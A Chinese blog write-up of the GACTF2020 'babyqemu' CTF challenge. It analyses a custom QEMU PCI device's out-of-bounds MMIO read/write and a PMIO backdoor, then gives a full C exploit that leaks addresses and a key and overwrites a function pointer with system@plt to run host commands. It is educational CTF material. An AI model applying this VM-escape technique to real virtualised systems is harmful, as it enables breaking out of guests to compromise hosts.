GACTF2020 babyqemu

已于 2024-01-05 16:02:50 修改
阅读量417 收藏 6
点赞数 9
文章标签: 笔记
于 2024-01-04 11:18:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xkzhy/article/details/135382248
版权
本文介绍了在Ubuntu18.04环境下进行环境配置时遇到的问题,着重剖析了denc_mmio_read和denc_mmio_write的越界读写漏洞以及denc_pmio_write的后门,同时提供了一个简单的exploit示例,展示了如何利用这些漏洞获取关键信息和执行代码。
摘要由CSDN通过智能技术生成

环境搭建

首先下载题目附件。由于利用方法不受环境影响,没有用 docker 环境。
在 ubuntu18.04 上运行缺少 libncursesw.so.6 ,需要安装 libncursesw6

sudo apt install libncursesw6

虚拟机密码为 root

漏洞分析 & 利用

设备相关的符号被去除。可以通过搜索 denc-mmio 定位到相关函数。

存在一处花指令,直接去除。

.text:00000000003AA140 E8 00 00 00 00                call    $+5
.text:00000000003AA140
.text:00000000003AA145 83 04 24 05                   add     dword ptr [rsp], 5
.text:00000000003AA149 C3                            retn

denc_mmio_writedenc_mmio_read 存在越界读写,另外 key 也可以泄露,qemu 地址可以越界读出。

/*
00000000 DencState struc ; (sizeof=0xB48, mappedto_112)
00000000 field_0 db 2808 dup(?)
00000AF8 key db 32 dup(?)
00000B18 field_B18 db 8 dup(?)
00000B20 buf dd 8 dup(?)
00000B40 fun dq ?                                ; offset
00000B48 DencState ends
*/

unsigned __int64 __fastcall denc_mmio_read(DencState *opaque, unsigned __int64 addr, int size)
{
  unsigned __int64 result; // rax

  if ( size != 4 )
    return -1LL;
  result = addr & 3;
  if ( (addr & 3) != 0 )
    return -1LL;
  if ( addr <= 0x24 )
    return opaque->buf[addr >> 2];
  return result;
}

unsigned __int64 __fastcall denc_mmio_write(DencState *opaque, unsigned __int64 addr, unsigned int val, int size)
{
  unsigned __int64 result; // rax

  result = (unsigned __int64)opaque;
  if ( size == 4 )
  {
    result = addr & 3;
    if ( (addr & 3) == 0 && addr <= 0x24 )
    {
      result = val ^ *(_DWORD *)&opaque->key[addr];
      opaque->buf[addr >> 2] = result;
    }
  }
  return result;
}

denc_pmio_write 存在后门。

__int64 __fastcall denc_pmio_write(DencState *opaque, unsigned __int64 addr, unsigned int val, int size)
{
  __int64 result; // rax

  result = (__int64)opaque;
  if ( size == 4 )
  {
    result = addr & 3;
    if ( (addr & 3) == 0 )
    {
      if ( addr <= 7 )
      {
        result = val ^ *(_DWORD *)&opaque->key[4 * addr];
        opaque->buf[addr] = result;
      }
      if ( addr == 0x660 )
        return opaque->fun(opaque->buf, 0LL, 0LL);
    }
  }
  return result;
}

exp

#include <ctype.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/io.h>

void qword_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

void *mmio_mem;

void mmio_write(uint32_t offset, uint32_t value) {
    *((uint32_t *) mmio_mem + offset) = value;
}

uint32_t mmio_read(uint32_t offset) {
    return *((uint32_t *) mmio_mem + offset);
}

void mmio_init() {
    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
    if (mmio_fd == -1) {
        perror("[-] failed to open mmio.🤔");
        exit(EXIT_FAILURE);
    }
    mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if (mmio_mem == MAP_FAILED) {
        perror("[-] failed to mmap mmio.");
        exit(EXIT_FAILURE);
    }
    if (mlock(mmio_mem, 0x1000) == -1) {
        perror("[-] failed to mlock mmio_mem.");
        exit(EXIT_FAILURE);
    }
}

uint32_t pmio_mem;

void pmio_write(uint32_t offset, uint32_t value) {
    outl(value, pmio_mem + offset);
}

uint32_t pmio_read(uint32_t offset) {
    return inl(pmio_mem + offset);
}

void pmio_init() {
    if (iopl(3) == -1) {
        perror("[-] iopl failed.");
        exit(EXIT_FAILURE);
    }
    FILE *pmio_fd = fopen("/sys/devices/pci0000:00/0000:00:04.0/resource", "r");
    fscanf(pmio_fd, "%*p%*p%*p%p", &pmio_mem);
    printf("[*] pmio_mem: %p\n", pmio_mem);
}

char cmd[0x20] = "cat flag; xcalc";

int main() {
    mmio_init();
    pmio_init();

    size_t leak_addr = mmio_read(8) | (1ll * mmio_read(9) << 32);
    printf("[+] leak addr: %p\n", leak_addr);
    size_t elf_base = leak_addr - 0x3a9ea8;
    printf("[*] elf base: %p\n", elf_base);
    size_t system_plt = elf_base + 0x2ccb60;
    printf("[*] system@plt addr: %p\n", system_plt);

    uint32_t key[10];
    for (int i = 0; i < 10; i++) {
        mmio_write(i, 0);
        key[i] = mmio_read(i);
    }
    qword_dump("leak key", key, sizeof(key));

    for (int i = 0; i < strlen(cmd); i += 4) {
        mmio_write(i / 4, (*(uint32_t *) &cmd[i]) ^ key[i / 4]);
    }

    mmio_write(8, (system_plt & 0xFFFFFFFF) ^ key[8]);
    mmio_write(9, (system_plt >> 32) ^ key[9]);

    pmio_write(0x660, 0x114514);

    return 0;
}
mmiopmio
关注
QEMU 逃逸相关例题
sky123博客
06-13 1130
实际上只能使用第二种方式,因为 PCI 设备内部会对访问的内存区域进行检查,不允许超过分配。的合法区间,因而我们只能通过第二种方式构造越界读写原语。上设置定时任务,不过时间设置为 -1 因此不会执行。函数定义如下,也就是说这里会将该定时任务时间设置为。位于 qemu 上,地址小于堆地址,而越界写。无法将下标设为负数,因此考虑其他方法。指向参数地址,从而实现任意命令执行。结构体的内容如下,其中。从前面的调试结果可以看到。实现虚拟机逃逸,由于。函数调用链如下,根据。的参数可知,最终会将。初始值为 1 ,而在。
qemu逃逸】GACTF2020-babyqemu
qq_61670993的博客
11-06 131
数组越界读写
GACTF2020 —— EasyRe Writeup
qq_43547885的博客
01-27 326
一道挺好的虚拟机加密+ SMC 的题 SMC 自解密部分 没有反调,因此分别在解密后把代码 dump 出来即可,这里使用 IDAPython 来读取内存数据def get_data(start_addr, end_addr): data = [] for ea in range(start_addr, end_addr): c = idc.Byte(ea) data.append(c) return data def unpack(): .
GACTF2020&vmpwn
qq_39948058的博客
08-27 213
**前言:上个星期复现了一道vmpwn题,忘记写到博客了,所以今天写一下,此题也属于比较常规的一种vmpwn题,只要逆出来opcode指令就能做出,这里根据官方wp来进行了复现了一下 思路:直接泄露了memaddr,然后再利用read往memaddr的后面进行了srop进行读取,即可 这里用到setcontext+15来控制执行流 这里没什么好演示的,直接给出exp吧** exp: #coding:utf8 from pwn import * libc = ELF('/lib/x86_64-lin
GACTF2020 WannaUp
lhk124的博客
09-08 339
要点:任何求余的操作都指明了一个点:限制了一个范围,从而限制了用到它的地方的范围 这道题的计算由 某一处的异或爆破+循环移位操作+异或运算 组成。 定位关键代码的几种方法 1.ida查找字符串,发现flag.bin和flag.txt。再使用x查找到了函数sub_402280 2.ida查看import表 发现如CryptDecryptGetWindowTextA 这类API,同样能定位到函数sub_402280 3.运行程序,一个gui界面,动态调试软件下断获取信息的api(r如GetDl..
GACTF2020 checkin
lhk124的博客
09-08 273
题目虽然是签到题。但是我刚开始不知道该如何入手。 查看字符串,没有发现有用的内容。 有人会习惯性查看import table 应该学习。 除了有详细的地方需要动态调试之外,当静态看不出什么时,应该先动态调试起来。 动态调试时f8开始走,跑飞时f7进入。抽丝剥茧。不是无脑f8 f7。要注意使用的api 函数等等。 GetCommandLineA :检索当前进程的命令行字符串(即获取内容的api) CreateProcessA:创建新进程 在我OD载入并运行时出现了这情况。在ocr88A.tmp\s
GACTF2020 Crymsic
EasonCc的博客
09-01 145
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
GACTF2020 misc_crymisc
PushSafe
09-01 1083
GACTF2020 misc_crymisc 本人刚开始打ctf不久,希望各位师傅能对此文章提出宝贵的建议。 题目地址. 题目文件下载。866h 下载好的文件为:crymisc.docx 打开后显示报错,考虑将docx转换为zip文件查看docx文件里面的内容: 发现题目要求的文件打开3.jpg报错并提示密码错误,这时考虑zip伪加密 找到加密位置 改为00即可。 奇怪的知识又增加了: zip文件头信息 标准开头:50 4B 03 04 解压pkware版本:14 00 全局方式位标记: 00 00
GACTF2020 - Wannaflag wp
Air_cat的博客
12-30 285
GACTF2020 - Wannaflag 题目链接 十分传统的一个winapi逆向。最近也很少见了,对新人有难度但有趣。 本篇的一些细节之处省略截图,但我会把步骤写明白。若复现不出来可评论或私信。 程序拿到手还有点大,443kb 同时附带了一个flag.bin 进去,打开发现是可读的一串字符串。很显然是被加密过了。 查pe,32位无壳 vs编译(这里我用的exeinfo) ida一打开就定位到了WinMain。这里很容易看出来其只调用了两个自定义函数 – 背景音乐(1b20),消息处理(2280) 进消息
GACTF2020-babyqemu
11-06
附件
GACTF2020 simpleflask& EZFLASK
汗的博客
09-03 1390
信息收集 直接访问,提示方法不允许 使用burpsuite,右键-change request method 提示了个name,猜测是参数 因为题目是flask,容易想到ssti,直接试name={{2*2}} 再试,因为可能是有过滤、waf之类的name={{2-2}},可以看到2-2有了结果 可以确定是存在ssti的,接下来就是具体的bypass和get flag了 bypass&利用 用burp进行一次fuzz,还做不到颅内ctf,以下是一个简单的fuzz字符list [ ] ( \
ACTF2020 writeup
qq_46365538的博客
06-20 697
ACTF2020 writeup 所属学校:中南大学 菜逼第一次打ctf,各位师傅手下留情 Pwm 不会 Reverse 题目名称 easyalgorithm FLAG: ACTF{Oolong_milk_tea} 大概就先把文件拖进IDA里面反编译一下,看反编译出来的c代码大概就知道是首先判断输入是否为ACTF{},然后将花括弧中的字符串赋给dest,然后通过4006A6和400792两个函数对dest进行加密,然后将得到的密文和v3后的连续地址上的asc码进行比较 [外链图片转存
GACTF oldmodem writeup
汗的博客
09-01 1552
题目描述 old modem (bell 202) China: https://pan.baidu.com/s/184Trg9M94uVSekGycaAR_w (密码:5mp2) Overseas: https://drive.google.com/drive/folders/1T94OrcveHAZTmTCwaVCojLXYlJc3lL3f?usp=sharing Writeup 首先,modem是调制解调器(猫)的意思,Google发现bell 202是一种标准,完成这些信息收集后,正式开始 下载文件
C++学习笔记----6、内存管理(五)---- 智能指针(3)
weixin_71738303的博客
09-11 1188
与指向特定类型的原始指针可以转化为不同类型的指针一样,shared_ptr保存特定的类型可以转化为一个另一种类型的shared_ptr。转化shared_ptr的函数是const_pointer_cast(),dynamic_pointer_cast(),static_pointer_cast()和reinterpret_pointer_cast()。前面简要提过,当拥有共享属主的智能指针,例如shared_ptr不在活动范围或者被重置时,只有它是最后指向的智能指针时才能释放其指向的资源。
ROS组合导航笔记1:融合传感器数据
最新发布
qq_44188415的博客
09-16 604
笔记
arm和riscv系统调用对比(笔记)
maosql
09-13 598
相似之处: ecall 和 SVC 都是用于从用户模式切换到内核模式,执行系统调用。它们的作用和使用方式非常相似,都是触发内核级别的处理,以处理用户请求的特权操作。不同之处: PendSV 是一个用于任务切换的中断机制,与 ecall 和 SVC 的作用不同。PendSV 主要用于上下文切换,而 ecall 和 SVC 是用于请求系统服务的机制。
shader 案例学习笔记之将坐标系分成4个象限
localhost
09-13 223
坐标系被分成了4个单元格,每个单元格都有唯一的索引,后续就可以根据索引去渲染。
UEFI学习笔记(五):EDK II PCD的概念、类型、使用
qq_44189622的博客
09-11 856
如果在BIOS里面有一些模块是binary方式集成进来的而这些binary又需要用到PCD(用于Binary Release),那么这些Binary集成的要用到的PCD就必须要设置为。PCD的值存在memory里面,下次启动时,上次更改的值丢失了,每次启动都是从default值开始。是存在VPD空间的(在FLASH上,只读),一般是出厂配置。如果platform是从源码build出来的,没有binary在里面的时候,PCD用的都是。作用域在一个模块中(模块级的),可以在Binary Level进行修改。
JUC学习笔记(二)
zhouDonQuixote的博客
09-16 1400
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录四、共享模型之内存4.1 Java 内存模型4.2 可见性退不出的循环解决方法可见性 vs 原子性模式之 Balking1.定义2.实现4.3 有序性原理之指令级并行1. 名词2.鱼罐头的故事3.指令重排序优化4.支持流水线的处理器诡异的结果解决方法原理之 volatile1.如何保证可见性2.如何保证有序性3.double-checked locking 问题4.double-checked locking 解决happens-
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值